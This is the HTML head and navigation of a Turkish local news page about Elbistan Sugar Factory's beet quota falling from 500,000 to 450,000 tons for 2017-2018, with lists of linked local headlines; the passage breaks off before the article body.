<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <title>Elbistan’ın kotası 500 binden 450 bin tona düştü</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan Şeker Fabrikası&#039;nın 2017-2018 dönemi pancar kotası geçtiğimiz yıla göre 50 bin ton düşürülerek 450 bin ton oldu."> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Elbistan’ın kotası 500 binden 450 bin tona düştü"> <meta property="og:description" content="Elbistan Şeker Fabrikası&#039;nın 2017-2018 dönemi pancar kotası geçtiğimiz yıla göre 50 bin ton düşürülerek 450 bin ton oldu."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Elbistan’ın kotası 500 binden 450 bin tona düştü"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="#"> <meta name="twitter:title" content="Elbistan’ın kotası 500 binden 450 bin tona düştü"> <meta name="twitter:description" content="Elbistan Şeker Fabrikası’nın 2017-2018 dönemi pancar kotası, geçtiğimiz yıla göre 50 bin ton düşürülerek 450 bin ton oldu."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG" /> <meta itemprop="headline" content="Elbistan’ın kotası 500 binden 450 bin tona düştü" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2017-02-22T15:26:43+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2017/02/elbistanin_kotasi_500_binden_450_bin_tona_dustu_h37935_7c1bc.JPG" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '9'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = '#'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">3.5991</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">3.7829</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">143.224</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">88917</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/muhtarlardan-cami-tarlasi-tepkisi-h37327.html" title="Muhtarlardan ‘cami tarlası’ tepkisi" >Muhtarlardan ‘cami tarlası’ tepkisi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/aelde-7-milyon-500-bin-ton-komur-uretildi-h37249.html" title="AEL’de, 7 milyon 500 bin ton kömür üretildi" >AEL’de, 7 milyon 500 bin ton kömür üretildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanspor-gol-oldu-yagdi-h37078.html" title="Elbistanspor, gol oldu yağdı" >Elbistanspor, gol oldu yağdı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="Elbistanlı 2 polis memuru hain saldırıda yaralandı" >Elbistanlı 2 polis memuru hain saldırıda yaralandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/4-firinciya-ornek-isyeri-belgesi-takdim-edildi-h37009.html" title="4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi" >4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hasta-sayisi-35-bin-sebebi-kirlilik-ve-dikkatsizlik-h35965.html" title="Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK" >Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-yarbay-ozer-dualarla-ugurlandi-h35408.html" title="Şehit Yarbay Özer, dualarla uğurlandı" >Şehit Yarbay Özer, dualarla uğurlandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-sehit-acisiyla-kara-bayrami-yasadi-h35406.html" title="Elbistan, şehit acısıyla kara bayramı yaşadı" >Elbistan, şehit acısıyla kara bayramı yaşadı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/giresundaki-helikopter-kazasinda-elbistanli-yarbay-sehit-oldu-h35405.html" title="Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu" >Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="ab4eff739db1253c7536fcaac8e74484821547d6" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Elbistan’ın kotası 500 binden 450 bin tona düştü" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="İhale İlanları" href="http://www.elbistaninsesi.com/ihale-ilanlari" id="k15" >İhale İlanları</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/meksel-orer-82-yasinda-h37933.html" title="Meksel Örer 82 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/meksel_orer_82_yasinda_h37933_d95e1.jpg" alt="Meksel Örer 82 yaşında" /> Meksel Örer 82 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/enver-dogan-49-yasinda-h37929.html" title="Enver Doğan 49 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/enver_dogan_49_yasinda_h37929_5ce9b.jpg" alt="Enver Doğan 49 yaşında" /> Enver Doğan 49 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-aslan-90-yasinda-h37912.html" title="Mehmet Aslan 90 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/mehmet_aslan_90_yasinda_h37912_fdc1c.jpg" alt="Mehmet Aslan 90 yaşında" /> Mehmet Aslan 90 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/duran-aytac-63-yasinda-h37904.html" title="Duran Aytaç 63 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/duran_aytac_63_yasinda_h37904_f2003.jpg" alt="Duran Aytaç 63 yaşında" /> Duran Aytaç 63 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/goksunda-girisimciler-sertifikalarini-aldilar-h37940.html" title="Göksun’da girişimciler sertifikalarını aldılar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/goksunda_girisimciler_sertifikalarini_aldilar_h37940_48d56.JPG" alt="Göksun’da girişimciler sertifikalarını aldılar" /> Göksun’da girişimciler sertifikalarını aldılar</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/buyuksehirden-aile-danismanlik-hizmeti-h37939.html" title="Büyükşehir’den, Aile Danışmanlık Hizmeti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/buyuksehirden_aile_danismanlik_hizmeti_h37939_bbb19.jpg" alt="Büyükşehir’den, Aile Danışmanlık Hizmeti" /> Büyükşehir’den, Aile Danışmanlık Hizmeti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hastane-icin-basvurular-genclik-merkezinde-alinacak-h37938.html" title="Hastane için başvurular Gençlik Merkezi’nde alınacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/hastane_icin_basvurular_genclik_merkezinde_alinacak_h37938_40f22.jpg" alt="Hastane için başvurular Gençlik Merkezi’nde alınacak" /> Hastane için başvurular Gençlik Merkezi’nde alınacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/yeni-kimligini-alamayanlar-gecici-kimlikle-ygsye-girecek-h37936.html" title="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/yeni_kimligini_alamayanlar_gecici_kimlikle_ygsye_girecek_h37936_e2463.jpg" alt="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek" /> Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-sp-ilce-baskani-polata-hayirli-olsun-ziyareti-h37925.html" title="Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/oztunctan_sp_ilce_baskani_polata_hayirli_olsun_ziyareti_h37925_3038a.jpg" alt="Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti" /> Öztunç’tan SP ilçe Başkanı Polat’a hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunc-nurhakta-hayir-toplantisi-yapti-h37916.html" title="Öztunç, Nurhak’ta ‘Hayır’ toplantısı yaptı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/oztunc_nurhakta_hayir_toplantisi_yapti_h37916_1aedb.jpg" alt="Öztunç, Nurhak’ta ‘Hayır’ toplantısı yaptı" /> Öztunç, Nurhak’ta ‘Hayır’ toplantısı yaptı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/hastaneye-isci-alimi-tbmmye-tasindi-h37867.html" title="Hastaneye işçi alımı TBMM’ye taşındı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/hastaneye_isci_alimi_tbmmye_tasindi_h37867_e147c.jpg" alt="Hastaneye işçi alımı TBMM’ye taşındı" /> Hastaneye işçi alımı TBMM’ye taşındı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/tor-isci-aliminda-parti-referansi-tek-kriter-olamaz-h37865.html" title="Tor: “İşçi alımında parti referansı tek kriter olamaz”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/tor_isci_aliminda_parti_referansi_tek_kriter_olamaz_h37865_43dee.JPG" alt="Tor: “İşçi alımında parti referansı tek kriter olamaz”" /> Tor: “İşçi alımında parti referansı tek kriter olamaz”</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-gun-sayiyor-h37926.html" title="Yeni Hastane gün sayıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/yeni_hastane_gun_sayiyor_h37926_50a2b.jpg" alt="Yeni Hastane gün sayıyor" /> Yeni Hastane gün sayıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/hastaneye-alim-is-kur-uzerinden-yapilacak-h37922.html" title="Hastaneye alım İş-Kur üzerinden yapılacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/hastaneye_alim_is_kur_uzerinden_yapilacak_h37922_9b585.JPG" alt="Hastaneye alım İş-Kur üzerinden yapılacak" /> Hastaneye alım İş-Kur üzerinden yapılacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/6-yasindaki-hastaya-ureterorenoskop-yontemiyle-tedavi-h37833.html" title="6 yaşındaki hastaya, üreterorenoskop yöntemiyle tedavi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/6_yasindaki_hastaya_ureterorenoskop_yontemiyle_tedavi_h37833_2b95c.JPG" alt="6 yaşındaki hastaya, üreterorenoskop yöntemiyle tedavi" /> 6 yaşındaki hastaya, üreterorenoskop yöntemiyle tedavi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/yancar-sigarayi-birakma-poliklinigi-ile-hizmet-sunuyoruz-h37814.html" title="Yancar, “Sigarayı Bırakma Polikliniği ile hizmet sunuyoruz”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/yancar_sigarayi_birakma_poliklinigi_ile_hizmet_sunuyoruz_h37814_e2fe5.JPG" alt="Yancar, “Sigarayı Bırakma Polikliniği ile hizmet sunuyoruz”" /> Yancar, “Sigarayı Bırakma Polikliniği ile hizmet sunuyoruz”</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrenci-tasima-guvenligi-toplantisi-yapildi-h37937.html" title="Öğrenci Taşıma Güvenliği Toplantısı yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/ogrenci_tasima_guvenligi_toplantisi_yapildi_h37937_db15f.jpg" alt="Öğrenci Taşıma Güvenliği Toplantısı yapıldı" /> Öğrenci Taşıma Güvenliği Toplantısı yapıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ozel-yildizda-yasama-yol-ver-semineri-h37927.html" title="Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/ozel_yildizda_yasama_yol_ver_semineri_h37927_6d338.jpg" alt="Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri" /> Özel Yıldız’da ‘Yaşama Yol Ver’ Semineri</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrencilere-bobrek-taramasi-h37900.html" title="Öğrencilere böbrek taraması"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/ogrencilere_bobrek_taramasi_h37900_7122e.jpg" alt="Öğrencilere böbrek taraması" /> Öğrencilere böbrek taraması</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/asker-ve-polis-agabeylerine-mektuplariyla-destek-verdiler-h37895.html" title="Asker ve polis ağabeylerine mektuplarıyla destek verdiler"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/asker_ve_polis_agabeylerine_mektuplariyla_destek_verdiler_h37895_e3e6d.jpg" alt="Asker ve polis ağabeylerine mektuplarıyla destek verdiler" /> Asker ve polis ağabeylerine mektuplarıyla destek verdiler</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-zirve-yolunda-3-puan-kaybetti-h37910.html" title="Elbistanspor, zirve yolunda 3 puan kaybetti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistanspor_zirve_yolunda_3_puan_kaybetti_h37910_00d4b.JPG" alt="Elbistanspor, zirve yolunda 3 puan kaybetti" /> Elbistanspor, zirve yolunda 3 puan kaybetti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/genc-kiz-futsal-turnuvasi-sona-erdi-h37889.html" title="Genç Kız Futsal Turnuvası sona erdi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/genc_kiz_futsal_turnuvasi_sona_erdi_h37889_73c1e.jpg" alt="Genç Kız Futsal Turnuvası sona erdi" /> Genç Kız Futsal Turnuvası sona erdi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kumbetspor-deplasmanindan-3-puanla-dondu-h37881.html" title="Elbistanspor, Kümbetspor deplasmanından 3 puanla döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistanspor_kumbetspor_deplasmanindan_3_puanla_dondu_h37881_03ecd.JPG" alt="Elbistanspor, Kümbetspor deplasmanından 3 puanla döndü" /> Elbistanspor, Kümbetspor deplasmanından 3 puanla döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-bertizsporu-4-golle-gecti-h37829.html" title="Elbistanspor, Bertizspor’u 4 golle geçti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistanspor_bertizsporu_4_golle_gecti_h37829_1b41d.JPG" alt="Elbistanspor, Bertizspor’u 4 golle geçti" /> Elbistanspor, Bertizspor’u 4 golle geçti</a> </div> </div></div><div class="katelement kat_k15"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37919.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/tc_elbistan_icra_dairesi_h37919_73a1c.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/findik-kabugu-h37909.html" title="FINDIK KABUĞU"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/findik_kabugu_h37909_3c6ec.jpg" alt="FINDIK KABUĞU" /> FINDIK KABUĞU</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/ilan-h37869.html" title="İLAN"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/ilan_h37869_31ecc.jpg" alt="İLAN" /> İLAN</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37787.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/tc_elbistan_icra_dairesi_h37787_67484.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/kosgeb-faizsiz-kredi-sonuclari-27-subatta-aciklanacak-h37924.html" title="KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kosgeb_faizsiz_kredi_sonuclari_27_subatta_aciklanacak_h37924_db2f8.jpg" alt="KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak" /> KOSGEB faizsiz kredi sonuçları 27 Şubat’ta açıklanacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/akademisyenler-pancar-tarimini-masaya-yatiracak-h37874.html" title="Akademisyenler, pancar tarımını masaya yatıracak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/akademisyenler_pancar_tarimini_masaya_yatiracak_h37874_16130.JPG" alt="Akademisyenler, pancar tarımını masaya yatıracak" /> Akademisyenler, pancar tarımını masaya yatıracak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/kosgebten-sifir-faizli-50-bin-lira-kredi-icin-ikinci-firsat-h37852.html" title="KOSGEB’ten sıfır faizli 50 bin lira kredi için ikinci fırsat"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kosgebten_sifir_faizli_50_bin_lira_kredi_icin_ikinci_firsat_h37852_2bba0.JPG" alt="KOSGEB’ten sıfır faizli 50 bin lira kredi için ikinci fırsat" /> KOSGEB’ten sıfır faizli 50 bin lira kredi için ikinci fırsat</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/elbistan-afsin-santral-yatirimi-gundemden-dusmuyor-h37843.html" title="Elbistan-Afşin santral yatırımı, gündemden düşmüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistan_afsin_santral_yatirimi_gundemden_dusmuyor_h37843_e9e9c.jpg" alt="Elbistan-Afşin santral yatırımı, gündemden düşmüyor" /> Elbistan-Afşin santral yatırımı, gündemden düşmüyor</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div> </div> </div> </div> <div id="flashaber" flash-id="fh37938" > <div class="f-kapsayici"> <div class="f-baslik">Flaş Haber</div> <div class="f-haber"> <a href="http://www.elbistaninsesi.com/guncel/hastane-icin-basvurular-genclik-merkezinde-alinacak-h37938.html" title="Hastane için başvurular Gençlik Merkezi’nde alınacak" target="_blank">Hastane için başvurular Gençlik Merkezi’nde alınacak</a> </div> <span class="glyphicons remove_2 f_kapat"></span> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/fransiz-elyne-muslumanligi-secti-ismi-elif-oldu-h37931.html" title="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/02/1_2_4.jpg" alt="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu" class="pull-left" /> <div class="caption-line"><p>Fransız Elyne, Müslümanlığı seçti ismi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-gun-sayiyor-h37926.html" title="Yeni Hastane gün sayıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/02/2_3_1.jpg" alt="Yeni Hastane gün sayıyor" class="pull-left" /> <div class="caption-line"><p>Yeni Hastane gün sayıyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-akkoyun-muhtarlarla-bir-araya-geldi-h37923.html" title="Kaymakam Akkoyun, muhtarlarla bir araya geldi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/02/1_3_1.jpg" alt="Kaymakam Akkoyun, muhtarlarla bir araya geldi" class="pull-left" /> <div class="caption-line"><p>Kaymakam Akkoyun, muhtarlarla bir araya...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/pancar-tariminin-sorunlari-ve-cozum-onerileri-anlatildi-h37915.html" title="Pancar tarımının sorunları ve çözüm önerileri anlatıldı" > <img 